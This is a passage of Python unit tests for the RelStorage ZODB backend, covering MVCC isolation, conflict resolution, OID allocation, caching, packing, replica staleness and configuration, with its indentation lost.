c2 = db.open()
r2 = c2.root()
r1['alpha']['beta'] = 'yes'
storage = c1._storage
t = transaction.Transaction()
t.description = u'isolation test 1'
c1.tpc_begin(t)
c1.commit(t)
storage.tpc_vote(storage._transaction)
storage.tpc_finish(storage._transaction)
# The second connection will now load root['alpha'], but due to
# MVCC, it should continue to see the old state.
self.assertIsNone(r2['alpha']._p_changed) # A ghost
self.assertFalse(r2['alpha'])
self.assertEqual(r2['alpha']._p_changed, 0)
# make root['alpha'] visible to the second connection
c2.sync()
# Now it should be in sync
self.assertIsNone(r2['alpha']._p_changed) # A ghost
self.assertTrue(r2['alpha'])
self.assertEqual(r2['alpha']._p_changed, 0)
self.assertEqual(r2['alpha']['beta'], 'yes')
# Repeat the test with root['gamma']
r1['gamma']['delta'] = 'yes'
storage = c1._storage
t = transaction.Transaction()
t.description = u'isolation test 2'
c1.tpc_begin(t)
c1.commit(t)
storage.tpc_vote(storage._transaction)
storage.tpc_finish(storage._transaction)
# The second connection will now load root[3], but due to MVCC,
# it should continue to see the old state.
self.assertIsNone(r2['gamma']._p_changed) # A ghost
self.assertFalse(r2['gamma'])
self.assertEqual(r2['gamma']._p_changed, 0)
# make root[3] visible to the second connection
c2.sync()
# Now it should be in sync
self.assertIsNone(r2['gamma']._p_changed) # A ghost
self.assertTrue(r2['gamma'])
self.assertEqual(r2['gamma']._p_changed, 0)
self.assertEqual(r2['gamma']['delta'], 'yes')
finally:
db.close()
def checkResolveConflictBetweenConnections(self, clear_cache=False):
# Verify that conflict resolution works between storage instances
# bound to connections.
obj = ConflictResolution.PCounter()
obj.inc()
# Establish a polling state; dostoreNP won't.
self._storage.poll_invalidations()
oid = self._storage.new_oid()
revid1 = self._dostoreNP(oid, data=zodb_pickle(obj))
self._storage.poll_invalidations()
# These will both poll and get the state for (oid, revid1)
# cached at that location, where it will be found during conflict
# resolution.
storage1 = self._storage.new_instance()
storage1.load(oid, '')
storage2 = self._storage.new_instance()
storage2.load(oid, '')
# Remember that the cache stats are shared between instances.
# The first had to fetch it, the second can use it.
__traceback_info__ = storage1._cache.stats()
self.assertEqual(storage1._cache.stats()['hits'], 1)
storage1._cache.reset_stats()
if clear_cache:
storage1._cache.clear(load_persistent=False)
self.assertEqual(storage1._cache.stats()['hits'], 0)
obj.inc()
obj.inc()
# The effect of committing two transactions with the same
# pickle is to commit two different transactions relative to
# revid1 that add two to _value.
root_storage = self._storage
try:
def noConflict(*_args, **_kwargs):
self.fail("Should be no conflict.")
storage1.tryToResolveConflict = noConflict
self._storage = storage1
_revid2 = self._dostoreNP(oid, revid=revid1, data=zodb_pickle(obj))
# This one had no conflicts and did no cache work
self.assertEqual(storage1._cache.stats()['hits'], 0)
self.assertEqual(storage1._cache.stats()['misses'], 0)
# This will conflict; we will prefetch everything through the cache,
# or database, and not the storage's loadSerial.
def noLoadSerial(*_args, **_kwargs):
self.fail("loadSerial on the storage should never be called")
storage2.loadSerial = noLoadSerial
self._storage = storage2
_revid3 = self._dostoreNP(oid, revid=revid1, data=zodb_pickle(obj))
# We don't actually update cache stats at all, however,
# despite the prefetching.
cache_stats = storage1._cache.stats()
__traceback_info__ = cache_stats, clear_cache
self.assertEqual(cache_stats['misses'], 0)
self.assertEqual(cache_stats['hits'], 0)
data, _serialno = self._storage.load(oid, '')
inst = zodb_unpickle(data)
self.assertEqual(inst._value, 5)
finally:
storage1.close()
storage2.close()
self._storage = root_storage
def checkResolveConflictBetweenConnectionsNoCache(self):
# If we clear the cache, we can still loadSerial()
self.checkResolveConflictBetweenConnections(clear_cache=True)
def check16KObject(self):
# Store 16 * 1024 bytes in an object, then retrieve it
data = b'a 16 byte string' * 1024
oid = self._storage.new_oid()
self._dostoreNP(oid, data=data)
got, _ = self._storage.load(oid, '')
self.assertIsInstance(got, bytes)
self.assertEqual(got, data)
self.assertEqual(len(got), len(data))
def check16MObject(self):
# Store 16 * 1024 * 1024 bytes in an object, then retrieve it
data = b'a 16 byte string' * (1024 * 1024)
oid = self._storage.new_oid()
self._dostoreNP(oid, data=data)
got, _serialno = self._storage.load(oid, '')
self.assertEqual(len(got), len(data))
self.assertEqual(got, data)
def check99X1900Objects(self):
# Store 99 objects each with 1900 bytes. This is intended
# to exercise possible buffer overfilling that the batching
# code might cause.
data = b'0123456789012345678' * 100
t = transaction.Transaction()
self._storage.tpc_begin(t)
oids = []
for _ in range(99):
oid = self._storage.new_oid()
self._storage.store(oid, b'\0'*8, data, '', t)
oids.append(oid)
self._storage.tpc_vote(t)
self._storage.tpc_finish(t)
for oid in oids:
got, _serialno = self._storage.load(oid, '')
self.assertEqual(len(got), len(data))
self.assertEqual(got, data)
def checkPreventOIDOverlap(self):
# Store an object with a particular OID, then verify that
# OID is not reused.
data = b'mydata'
oid1 = b'\0' * 7 + b'\x0f'
self._dostoreNP(oid1, data=data)
oid2 = self._storage.new_oid()
oid1_int = bytes8_to_int64(oid1)
oid2_int = bytes8_to_int64(oid2)
self.assertGreater(
oid2_int, oid1_int,
'old OID %r (%d) should be less than new OID %r (%d)'
% (oid1, oid1_int, oid2, oid2_int))
def checkNoDuplicateOIDsManyThreads(self):
# Many threads in many storages can allocate OIDs with
# no duplicates or overlaps.
# https://github.com/zodb/relstorage/issues/283
from itertools import combinations
thread_count = 11
oids_per_segment = 578
segment_count = 3
total_expected_oids = oids_per_segment * segment_count
oids_by_thread = [list() for _ in range(thread_count)]
def allocate_oids(thread_storage, thread_num):
conn_pool = thread_storage._store_connection_pool
store_conn = conn_pool.borrow()
try:
allocator = thread_storage._oids
my_oids = oids_by_thread[thread_num]
for _ in range(segment_count):
my_oids.extend(
bytes8_to_int64(thread_storage.new_oid())
for _ in range(oids_per_segment)
)
# Periodically call set_min_oid, like the storage does,
# to check for interference.
with conn_pool.borrowing() as store_conn:
allocator.set_min_oid(store_conn, my_oids[-1])
store_conn.commit()
finally:
self.assertLessEqual(conn_pool.pooled_connection_count, len(threads))
thread_storage.release()
threads = [threading.Thread(target=allocate_oids,
args=(self._storage.new_instance(), i))
for i in range(thread_count)]
for t in threads:
t.start()
for t in threads:
t.join(99)
# All of them are released, so we should be down to only one instance.
self.assertEqual(1, self._storage._store_connection_pool.instance_count)
self.assertLessEqual(self._storage._store_connection_pool.pooled_connection_count, 1)
# They all have the desired length, and each one has no duplicates.
self.assertEqual(
[len(s) for s in oids_by_thread],
[total_expected_oids for _ in range(thread_count)]
)
self.assertEqual(
[len(s) for s in oids_by_thread],
[len(set(s)) for s in oids_by_thread]
)
# They are all disjoint
for a, b in combinations(oids_by_thread, 2):
__traceback_info__ = a, b
a = set(a)
b = set(b)
self.assertTrue(a.isdisjoint(b))
# They are all monotonically increasing.
for s in oids_by_thread:
self.assertEqual(
s,
sorted(s)
)
def checkUseCache(self):
# Store an object, cache it, then retrieve it from the cache
self._storage = self.make_storage(
cache_servers='x:1 y:2',
cache_module_name=fakecache.__name__,
cache_prefix='zzz',
)
fakecache.data.clear()
db = DB(self._storage)
try:
c1 = db.open()
self.assertEqual(
c1._storage._cache.cache.g.client.servers,
['x:1', 'y:2'])
r1 = c1.root()
# The root state and checkpoints should now be cached.
# A commit count *might* be cached depending on the ZODB version.
# (Checkpoints are stored in the cache for the sake of tests/monitoring,
# but aren't read.)
# self.assertIn('zzz:checkpoints', fakecache.data)
# self.assertIsNotNone(db.storage._cache.polling_state.checkpoints)
self.assertEqual(sorted(fakecache.data.keys())[-1][:10],
'zzz:state:')
r1['alpha'] = PersistentMapping()
transaction.commit()
cp_count = 1
if self.keep_history:
item_count = 2
else:
# The previous root state was automatically invalidated
# XXX: We go back and forth on that.
item_count = 2
item_count += cp_count
self.assertEqual(len(fakecache.data), item_count)
oid = r1['alpha']._p_oid
c1._storage.load(oid, '')
# Came out of the cache, nothing new
self.assertEqual(len(fakecache.data), item_count)
# make a change
r1['beta'] = 0
transaction.commit()
# Once again, history free automatically invalidated.
# XXX: Depending on my mood.
item_count += 1
self.assertEqual(len(fakecache.data), item_count)
c1._storage.load(oid, '')
# try to load an object that doesn't exist
self.assertRaises(KeyError, c1._storage.load, b'bad.oid.', '')
finally:
db.close()
def checkMultipleStores(self):
# Verify a connection can commit multiple transactions
db = DB(self._storage)
try:
c1 = db.open()
r1 = c1.root()
r1['alpha'] = 1
transaction.commit()
r1['alpha'] = 2
transaction.commit()
finally:
db.close()
def checkLongTransactionDescription(self):
# Don't trip over long transaction descriptions
db = DB(self._storage)
try:
c = db.open()
r = c.root()
r['key'] = 1
transaction.get().note(u'A long description. ' * 1000)
transaction.commit()
finally:
db.close()
def checkAutoReconnect(self):
# Verify auto-reconnect
db = self._closing(DB(self._storage))
c1 = db.open()
r = c1.root()
r['alpha'] = 1
transaction.commit()
c1.close()
# Going behind its back.
c1._storage._load_connection.connection.close()
c1._storage._store_connection_pool.hard_close_all_connections()
store_pool = c1._storage._store_connection_pool
self.assertEqual(store_pool.instance_count, 2)
self.assertLessEqual(store_pool.pooled_connection_count, 1)
# ZODB5 implicitly calls sync
# immediately when a connection is opened;
# fake that here for older releases.
c2 = db.open()
self.assertIs(c2, c1)
c2.sync()
r = c2.root()
self.assertEqual(r['alpha'], 1)
r['beta'] = PersistentMapping()
c2.add(r['beta']) # Calling new_oid outside of TPC
transaction.commit()
c2.close()
del c1
del c2
def checkAutoReconnectOnSync(self):
# Verify auto-reconnect.
db = self._closing(DB(self._storage))
c1 = db.open()
r = c1.root()
c1._storage._load_connection.connection.close()
c1._storage.sync(True)
# ZODB5 calls sync when a connection is opened. Our monkey
# patch on a Connection makes sure that works in earlier
# versions, but we don't have that patch on ZODB5. So test
# the storage directly. NOTE: The load connection must be open.
# to trigger the actual sync.
r = c1.root()
r['alpha'] = 1
transaction.commit()
c1.close()
c1._storage._load_connection.connection.close()
c1._storage._store_connection_pool.hard_close_all_connections()
store_pool = c1._storage._store_connection_pool
self.assertEqual(store_pool.instance_count, 2)
self.assertLessEqual(store_pool.pooled_connection_count, 1)
c2 = db.open()
self.assertIs(c2, c1)
self.assertEqual(store_pool.instance_count, 2)
self.assertLessEqual(store_pool.pooled_connection_count, 1)
r = c2.root()
self.assertEqual(r['alpha'], 1)
r['beta'] = PersistentMapping()
c2.add(r['beta'])
transaction.commit()
c2.close()
del c1
del c2
def checkCachePolling(self):
storage2 = self.make_storage(zap=False)
db = DB(self._storage)
db2 = DB(storage2)
try:
# Set up the database.
tm1 = transaction.TransactionManager()
c1 = db.open(transaction_manager=tm1)
r1 = c1.root()
r1['obj'] = obj1 = PersistentMapping({'change': 0})
tm1.commit()
# Load and change the object in an independent connection.
tm2 = transaction.TransactionManager()
c2 = db2.open(transaction_manager=tm2)
r2 = c2.root()
r2['obj']['change'] = 1
tm2.commit()
# Now c2 has delta_after0.
# self.assertEqual(len(c2._storage._cache.delta_after0), 2)
c2.close()
# Change the object in the original connection.
c1.sync()
obj1['change'] = 2
tm1.commit()
# Close the database connection to c2.
c2._storage._load_connection.drop()
self.assertFalse(c2._storage._load_connection)
# Make the database connection to c2 reopen without polling.
c2._storage.load(b'\0' * 8, '')
self.assertTrue(c2._storage._load_connection)
# Open a connection, which should be the same connection
# as c2.
c3 = db2.open(transaction_manager=tm2)
self.assertTrue(c3 is c2)
# self.assertEqual(len(c2._storage._cache.delta_after0), 2)
# Clear the caches (but not delta_after*)
c3._resetCache()
c3._storage._cache.cache.flush_all()
obj3 = c3.root()['obj']
# Should have loaded the new object.
self.assertEqual(obj3['change'], 2)
finally:
db.close()
db2.close()
def checkDoubleCommitter(self):
# Verify we can store an object that gets committed twice in
# a single transaction.
db = DB(self._storage)
try:
conn = db.open()
try:
conn.root()['dc'] = DoubleCommitter()
transaction.commit()
conn2 = db.open()
self.assertEqual(conn2.root()['dc'].new_attribute, 1)
conn2.close()
finally:
transaction.abort()
conn.close()
finally:
db.close()
def checkHistoryWithExtension(self):
# Verify the history method works with transactions that have
# extended info.
db = DB(self._storage)
try:
conn = db.open()
try:
conn.root()['pi'] = 3.14
transaction.get().setExtendedInfo("digits", 3)
transaction.commit()
history = self._storage.history(conn.root()._p_oid)
self.assertEqual(len(history), 1)
if self.keep_history:
self.assertEqual(history[0]['digits'], 3)
finally:
conn.close()
finally:
db.close()
def checkPackBatchLockNoWait(self):
# Holding the commit lock doesn't interfere with packing.
#
# TODO: But what about row locking? Let's add a test
# that begins a commit and locks some rows and then packs.
self._storage = self.make_storage(pack_batch_timeout=0)
adapter = self._storage._adapter
test_conn, test_cursor = adapter.connmanager.open_for_store()
db = self._closing(DB(self._storage))
try:
# add some data to be packed
c = self._closing(db.open())
r = c.root()
r['alpha'] = PersistentMapping()
transaction.commit()
del r['alpha']
transaction.commit()
# Pack, with a commit lock held
now = packtime = time.time()
while packtime <= now:
packtime = time.time()
adapter.locker.hold_commit_lock(test_cursor)
self._storage.pack(packtime, referencesf)
adapter.locker.release_commit_lock(test_cursor)
finally:
db.close()
adapter.connmanager.close(test_conn, test_cursor)
def checkPackKeepNewObjects(self):
# Packing should not remove objects created or modified after
# the pack time, even if they are unreferenced.
db = DB(self._storage)
try:
# add some data to be packed
c = db.open()
extra1 = PersistentMapping()
c.add(extra1)
extra2 = PersistentMapping()
c.add(extra2)
transaction.commit()
# Choose the pack time to be that last committed transaction.
packtime = c._storage.lastTransactionInt()
extra2.foo = 'bar'
extra3 = PersistentMapping()
c.add(extra3)
transaction.commit()
self.assertGreater(c._storage.lastTransactionInt(), packtime)
self._storage.pack(packtime, referencesf)
# extra1 should have been garbage collected
self.assertRaises(KeyError,
self._storage.load, extra1._p_oid, '')
# extra2 and extra3 should both still exist
self._storage.load(extra2._p_oid, '')
self._storage.load(extra3._p_oid, '')
finally:
db.close()
def checkPackBrokenPickle(self):
# Verify the pack stops with the right exception if it encounters
# a broken pickle.
# Under Python 2, with zodbpickle, there may be a difference depending
# on whether the accelerated implementation is in use. Also ,the pure-python
# version on PyPy can raise IndexError
from zodbpickle.pickle import UnpicklingError as pUnpickErr
unpick_errs = (pUnpickErr, IndexError)
try:
from zodbpickle.fastpickle import UnpicklingError as fUnpickErr
except ImportError:
pass
else:
unpick_errs += (fUnpickErr,)
self._dostoreNP(self._storage.new_oid(), data=b'brokenpickle')
self.assertRaises(unpick_errs, self._storage.pack,
time.time() + 10000, referencesf)
def checkBackwardTimeTravelWithoutRevertWhenStale(self):
# If revert_when_stale is false (the default), when the database
# connection is stale (such as through failover to an
# asynchronous slave that is not fully up to date), the poller
# should notice that backward time travel has occurred and
# raise a ReadConflictError.
self._storage = self.make_storage(revert_when_stale=False)
db = DB(self._storage)
try:
c = db.open()
c._storage._adapter.poller.transactions_may_go_backwards = True
r = c.root()
r['alpha'] = PersistentMapping()
transaction.commit()
# To simulate failover to an out of date async slave, take
# a snapshot of the database at this point, change some
# object, then restore the database to its earlier state.
d = tempfile.mkdtemp()
try:
# Snapshot the database.
fs = FileStorage(os.path.join(d, 'Data.fs'))
fs.copyTransactionsFrom(c._storage)
# Change data in it.
r['beta'] = PersistentMapping()
transaction.commit()
self.assertTrue('beta' in r)
# Revert the data.
# We must use a separate, unrelated storage object to do this,
# because our storage object is smart enough to notice that the data
# has been zapped and revert caches for all connections and
# ZODB objects when we invoke this API.
storage_2 = self.make_storage(zap=False)
storage_2.zap_all(reset_oid=False, slow=True)
storage_2.copyTransactionsFrom(fs)
storage_2.close()
del storage_2
fs.close()
del fs
finally:
shutil.rmtree(d)
# Sync, which will call poll_invalidations().
c.sync()
# Try to load an object, which should cause ReadConflictError.
r._p_deactivate()
with self.assertRaises(ReadConflictError):
r.__getitem__('beta')
finally:
db.close()
def checkBackwardTimeTravelWithRevertWhenStale(self):
# If revert_when_stale is true, when the database
# connection is stale (such as through failover to an
# asynchronous slave that is not fully up to date), the poller
# should notice that backward time travel has occurred and
# invalidate all objects that have changed in the interval.
self._storage = self.make_storage(revert_when_stale=True)
db = DB(self._storage)
try:
transaction.begin()
c = db.open()
r = c.root()
r['alpha'] = PersistentMapping()
transaction.commit()
# To simulate failover to an out of date async slave, take
# a snapshot of the database at this point, change some
# object, then restore the database to its earlier state.
d = tempfile.mkdtemp()
try:
transaction.begin()
fs = FileStorage(os.path.join(d, 'Data.fs'))
fs.copyTransactionsFrom(c._storage)
r['beta'] = PersistentMapping()
transaction.commit()
self.assertTrue('beta' in r)
c._storage.zap_all(reset_oid=False, slow=True)
c._storage.copyTransactionsFrom(fs)
fs.close()
finally:
shutil.rmtree(d)
# r should still be in the cache.
self.assertTrue('beta' in r)
# Now sync, which will call poll_invalidations().
c.sync()
# r should have been invalidated
self.assertEqual(r._p_changed, None)
# r should be reverted to its earlier state.
self.assertFalse('beta' in r)
finally:
db.close()
@util.skipOnAppveyor("Random failures")
# https://ci.appveyor.com/project/jamadden/relstorage/build/1.0.75/job/32uu4xdp5mubqma8
def checkBTreesLengthStress(self):
# BTrees.Length objects are unusual Persistent objects: they
# have a conflict resolution algorithm that cannot fail, so if
# we do get a failure it's due to a problem with us.
# Unfortunately, tryResolveConflict hides all underlying exceptions
# so we have to enable logging to see them.
from relstorage.adapters.interfaces import UnableToAcquireLockError
from ZODB.ConflictResolution import logger as CRLogger
from BTrees.Length import Length
import BTrees
from six import reraise
def log_err(*args, **kwargs): # pylint:disable=unused-argument
import sys
reraise(*sys.exc_info())
CRLogger.debug = log_err
CRLogger.exception = log_err
updates_per_thread = 50
thread_count = 4
lock_errors = []
self.maxDiff = None
db = DB(self._storage)
try:
c = db.open()
try:
root = c.root()
root['length'] = Length()
# XXX: Eww! On MySQL, if we try to take a shared lock on
# OID 0, and a write lock on OID 1, we fail with a deadlock
# error. It seems that taking the shared lock on 0 also takes a shared
# lock on 1 --- somehow. Because they're adjacent to each other?
# I don't know. We have to add some space between them to be sure
# that doesn't happen. On MySQL 5.7, just 10 extra items was enough.
# On MySQL 8, we had to add more.
for i in range(50):
root[i] = BTrees.OOBTree.BTree() # pylint:disable=no-member
transaction.commit()
except:
transaction.abort()
raise
finally:
c.close()
def updater():
for _ in range(updates_per_thread):
thread_c = db.open()
__traceback_info__ = thread_c._storage
try:
# Perform readCurrent on an object not being modified.
# This adds stress to databases that use separate types of locking
# for modified and current objects. It was used to discover
# bugs in gevent+MySQL and plain MySQLdb against both 5.7 and 8.
root = thread_c.root()
root._p_activate() # unghost; only non-ghosts can readCurrent
root._p_jar.readCurrent(root)
root['length'].change(1)
time.sleep(random.random() * 0.05)
try:
transaction.commit()
except UnableToAcquireLockError as e:
lock_errors.append((type(e), str(e)))
transaction.abort()
raise
finally:
thread_c.close()
threads = []
for _ in range(thread_count):
t = threading.Thread(target=updater)
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join(120)
self.assertEqual(lock_errors, [])
c = db.open()
try:
self.assertEqual(c.root()['length'](),
updates_per_thread * thread_count)
finally:
transaction.abort()
c.close()
finally:
db.close()
del CRLogger.debug
del CRLogger.exception
def checkAfterCompletion(self):
# The after completion method, which can only be called
# outside of 2-phase commit is otherise equivalent to calling
# tpc_abort.
from ZODB.interfaces import IMVCCAfterCompletionStorage
self._storage = self.make_storage(revert_when_stale=False)
with mock.patch.object(self._storage._load_connection,
'rollback_quietly') as rb:
self._storage.afterCompletion()
rb.assert_called_with()
self.assertTrue(
IMVCCAfterCompletionStorage.providedBy(self._storage))
def checkConfigureViaZConfig(self):
replica_fn = None
replica_conf = ''
if util.DEFAULT_DATABASE_SERVER_HOST == util.STANDARD_DATABASE_SERVER_HOST:
replica_fn = self.get_adapter_zconfig_replica_conf()
if replica_fn:
replica_conf = 'replica-conf ' + self.get_adapter_zconfig_replica_conf()
conf = u"""
%import relstorage
<zodb main>
<relstorage>
name xyz
read-only false
keep-history {KEEP_HISTORY}
{REPLICA_CONF}
blob-dir .
blob-cache-size-check-external true
blob-cache-size 100MB
blob-chunk-size 10MB
cache-local-dir-read-count 12
cache-local-dir-write-max-size 10MB
{ADAPTER}
</relstorage>
</zodb>
""".format(
KEEP_HISTORY='true' if self.keep_history else 'false',
REPLICA_CONF=replica_conf,
ADAPTER=self.get_adapter_zconfig()
)
__traceback_info__ = conf
schema_xml = u"""
<schema>
<import package="ZODB"/>
<section type="ZODB.database" name="main" attribute="database"/>
</schema>
"""
import ZConfig
from io import StringIO
from ZODB.interfaces import IBlobStorageRestoreable
from relstorage.adapters.interfaces import IRelStorageAdapter
from relstorage.blobhelper.interfaces import ICachedBlobHelper
from hamcrest import assert_that
from nti.testing.matchers import validly_provides
schema = ZConfig.loadSchemaFile(StringIO(schema_xml))
config, _ = ZConfig.loadConfigFile(schema, StringIO(conf))
db = config.database.open()
try:
storage = db.storage
assert_that(storage, validly_provides(IBlobStorageRestoreable))
self.assertEqual(storage.isReadOnly(), False)
self.assertEqual(storage.getName(), "xyz")
assert_that(storage.blobhelper, validly_provides(ICachedBlobHelper))
self.assertIn('_External', str(storage.blobhelper.cache_checker))
adapter = storage._adapter
self.assertIsInstance(adapter, self.get_adapter_class())
assert_that(adapter, validly_provides(IRelStorageAdapter))
self.verify_adapter_from_zconfig(adapter)
self.assertEqual(adapter.keep_history, self.keep_history)
if replica_fn:
self.assertEqual(
adapter.connmanager.replica_selector.replica_conf,
replica_fn)
self.assertEqual(storage._options.blob_chunk_size, 10485760)
finally:
db.close()
def checkGeventSwitchesOnOpen(self):
# We make some queries when we open; if the driver is gevent
# capable, that should switch.
driver = self._storage._adapter.driver
if not driver.gevent_cooperative():
raise unittest.SkipTest("Driver %s not gevent capable" % (driver,))
from gevent.util import assert_switches
with assert_switches():
self.open()
#####
# Prefetch Tests
#####
def checkPrefetch(self):
db = DB(self._storage)
conn = db.open()
mapping = conn.root()['key'] = PersistentMapping()
transaction.commit()
item_count = 3
# The new state for the root invalidated the old state,
# and since there is no other connection that might be using it,
# we drop it from the cache.
item_count = 2
self.assertEqual(item_count, len(self._storage._cache))
tid = bytes8_to_int64(mapping._p_serial)
d = self._storage._cache.local_client._cache
self.assertEqual(d[0].max_tid, tid)
self.assertEqual(d[1].max_tid, tid)
self._storage._cache.clear()
self.assertEmpty(self._storage._cache)
conn.prefetch(z64, mapping)
self.assertEqual(2, len(self._storage._cache))
# second time is a no-op
conn.prefetch(z64, mapping)
self.assertEqual(2, len(self._storage._cache))
######
# Parallel Commit Tests
######
@skipIfNoConcurrentWriters
def checkCanVoteAndCommitWhileOtherStorageVotes(self):
storage1 = self._closing(self._storage.new_instance())
storage2 = self._closing(self._storage.new_instance())
# Bring them both into tpc_vote phase. Before parallel commit,
# this would have blocked as the first storage took the commit lock
# in tpc_vote.
txs = {}
for storage in (storage1, storage2):
data = zodb_pickle(MinPO(str(storage)))
t = TransactionMetaData()
txs[storage] = t
storage.tpc_begin(t)
oid = storage.new_oid()
storage.store(oid, None, data, '', t)
storage.tpc_vote(t)
# The order we choose to finish is the order of the returned
# tids.
tid1 = storage2.tpc_finish(txs[storage2])
tid2 = storage1.tpc_finish(txs[storage1])
self.assertGreater(tid2, tid1)
storage1.close()
storage2.close()
def checkCanLoadObjectStateWhileBeingModified(self):
# Get us an object in the database
storage1 = self._closing(self._storage.new_instance())
data = zodb_pickle(MinPO(str(storage1)))
t = TransactionMetaData()
storage1.tpc_begin(t)
oid = storage1.new_oid()
storage1.store(oid, None, data, '', t)
storage1.tpc_vote(t)
initial_tid = storage1.tpc_finish(t)
storage1.release()
del storage1
self._storage._cache.clear(load_persistent=False)
storage1 = self._closing(self._storage.new_instance())
# Get a completely independent storage, not sharing a cache
storage2 = self._closing(self.make_storage(zap=False))
# First storage attempts to modify the oid.
t = TransactionMetaData()
storage1.tpc_begin(t)
storage1.store(oid, initial_tid, data, '', t)
# And locks the row.
storage1.tpc_vote(t)
# storage2 would like to read the old row.
loaded_data, loaded_tid = storage2.load(oid)
self.assertEqual(loaded_data, data)
self.assertEqual(loaded_tid, initial_tid)
# Commit can now happen.
tid2 = storage1.tpc_finish(t)
self.assertGreater(tid2, initial_tid)
storage1.close()
storage2.close()
###
# IStorageCurrentRecordIteration tests
###
def check_record_iternext_basic(self, start_oid_int=None):
# Based on code from FileStorage tests
db = DB(self._storage)
conn = db.open()
conn.root()['abc'] = MinPO('abc')
conn.root()['xyz'] = MinPO('xyz')
transaction.commit()
# Now, add some additional revisions. This proves that we iterate latest reconds,
# not all transactions.
conn.root()['abc'].value = 'def'
conn.root()['xyz'].value = 'ghi'
transaction.commit()
conn.close()
storage2 = self._closing(self._storage.new_instance())
# The special case: convert to byte OID
token = None if start_oid_int is None else int64_to_8bytes(start_oid_int)
# (0, 1, 2) by default, or, e.g, (1, 2)
expected_oids = range(start_oid_int or 0, 3)
if not expected_oids:
assert start_oid_int > 3
# Call at least once.
expected_oids = (0,)
record_count = 0
for x in expected_oids:
oid, tid, data, next_token = self._storage.record_iternext(token)
record_count += 1
self.assertEqual(oid, int64_to_8bytes(x))
token = next_token
expected_data, expected_tid = storage2.load(oid)
self.assertEqual(expected_data, data)
self.assertEqual(expected_tid, tid)
if x == 2:
check_token = self.assertIsNone
else:
check_token = self.assertIsNotNone
check_token(token)
self.assertEqual(len(expected_oids), record_count)
def check_record_iternext_token_0(self):
# Passing a starting token.
self.check_record_iternext_basic(0)
def check_record_iternext_token_1(self):
# Gets a subset.
self.check_record_iternext_basic(1)
def check_record_iternext_too_large_oid(self):
with self.assertRaises(StopIteration):
self.check_record_iternext_basic(10)
class AbstractRSZodbConvertTests(StorageCreatingMixin,
FSZODBConvertTests,
# This one isn't cooperative in
# setUp(), so it needs to be last.
ZODB.tests.util.TestCase):
keep_history = True
filestorage_name = 'source'
relstorage_name = 'destination'
filestorage_file = None
def setUp(self):
super(AbstractRSZodbConvertTests, self).setUp()
cfg = """
%%import relstorage
%%import zc.zlibstorage
<zlibstorage %s>
<filestorage>
path %s
</filestorage>
</zlibstorage>
<zlibstorage %s>
<relstorage>
%s
cache-prefix %s
cache-local-dir %s
</relstorage>
</zlibstorage>
""" % (
self.filestorage_name,
self.filestorage_file,
self.relstorage_name,
self.get_adapter_zconfig(),
self.relstorage_name,
os.path.abspath('.'),
)
self._write_cfg(cfg)
self.make_storage(zap=True).close()
def _wrap_storage(self, storage):
return self._closing(ZlibStorage(storage))
def _create_dest_storage(self):
return self._wrap_storage(super(AbstractRSZodbConvertTests, self)._create_dest_storage())
def _create_src_storage(self):
return self._wrap_storage(super(AbstractRSZodbConvertTests, self)._create_src_storage())
def test_new_instance_still_zlib(self):
storage = self._closing(self.make_storage())
new_storage = self._closing(storage.new_instance())
self.assertIsInstance(new_storage,
ZlibStorage)
self.assertIn('_crs_untransform_record_data', storage.base.__dict__)
self.assertIn('_crs_transform_record_data', storage.base.__dict__)
self.assertIn('_crs_untransform_record_data', new_storage.base.__dict__)
self.assertIn('_crs_transform_record_data', new_storage.base.__dict__)
class AbstractRSDestZodbConvertTests(AbstractRSZodbConvertTests):
zap_supported_by_dest = True
@property
def filestorage_file(self):
return self.srcfile
def _create_dest_storage(self):
return self._closing(self.make_storage(cache_prefix=self.relstorage_name, zap=False))
class AbstractRSSrcZodbConvertTests(AbstractRSZodbConvertTests):
filestorage_name = 'destination'
relstorage_name = 'source'
@property
def filestorage_file(self):
return self.destfile
def _create_src_storage(self):
return self._closing(self.make_storage(cache_prefix=self.relstorage_name, zap=False))
class AbstractIDBOptionsTest(unittest.TestCase):
db_options = None
def test_db_options_compliance(self):
from hamcrest import assert_that
from nti.testing.matchers import validly_provides
from relstorage.adapters.interfaces import IDBDriverOptions
from relstorage.adapters.interfaces import IDBDriverFactory
__traceback_info__ = self.db_options
assert_that(self.db_options, validly_provides(IDBDriverOptions))
for factory in self.db_options.known_driver_factories():
assert_that(factory, validly_provides(IDBDriverFactory))
class AbstractIDBDriverTest(unittest.TestCase):
driver = None
def test_db_driver_compliance(self):
from hamcrest import assert_that
from nti.testing.matchers import validly_provides
from relstorage.adapters.interfaces import IDBDriver
__traceback_info__ = self.driver
assert_that(self.driver, validly_provides(IDBDriver))
class DoubleCommitter(Persistent):
"""A crazy persistent class that changes self in __getstate__"""
def __getstate__(self):
if not hasattr(self, 'new_attribute'):
self.new_attribute = 1 # pylint:disable=attribute-defined-outside-init
return Persistent.__getstate__(self)
def _close_and_clean_storage(storage):
try:
storage.close()
storage.cleanup()
except Exception: # pylint:disable=broad-except
pass
class AbstractToFileStorage(RelStorageTestBase):
# Subclass this and set:
# - keep_history = True; and
# - A base class of UndoableRecoveryStorage
#
# or
# - keep_history = False; and
# A base class of BasicRecoveryStorage
# We rely on being placed in a temporary directory by a super
# class that will be cleaned up by tearDown().
def setUp(self):
super(AbstractToFileStorage, self).setUp()
# Use the abspath so that even if we close it after
# we've returned to our original directory (e.g.,
# close is run as part of addCleanup(), which happens after
# tearDown) we don't write index files into the original directory.
self._dst_path = os.path.abspath(self.rs_temp_prefix + 'Dest.fs')
self.__dst = None
@property
def _dst(self):
if self.__dst is None:
self.__dst = FileStorage(self._dst_path, create=True)
# On Windows, though, this could be too late: We can't remove
# files that are still open, and zope.testing.setupstack
# was asked to remove the temp dir as part of tearing itself down;
# cleanups run after tearDown runs (which is when the setupstack runs.)
self.addCleanup(_close_and_clean_storage, self.__dst)
return self.__dst
def tearDown(self):
if hasattr(self.__dst, 'close'):
_close_and_clean_storage(self.__dst)
self.__dst = 42 # Not none so we don't try to create.
super(AbstractToFileStorage, self).tearDown()
def new_dest(self):
return self._closing(FileStorage(self._dst_path))
class AbstractFromFileStorage(RelStorageTestBase):
# As for AbstractToFileStorage
def setUp(self):
super(AbstractFromFileStorage, self).setUp()
self._src_path = os.path.abspath(self.rs_temp_prefix + 'Source.fs')
self.__dst = None
def make_storage_to_cache(self):
return FileStorage(self._src_path, create=True)
@property
def _dst(self):
if self.__dst is None:
self.__dst = self.make_storage()
self.addCleanup(_close_and_clean_storage, self.__dst)
return self.__dst
def tearDown(self):
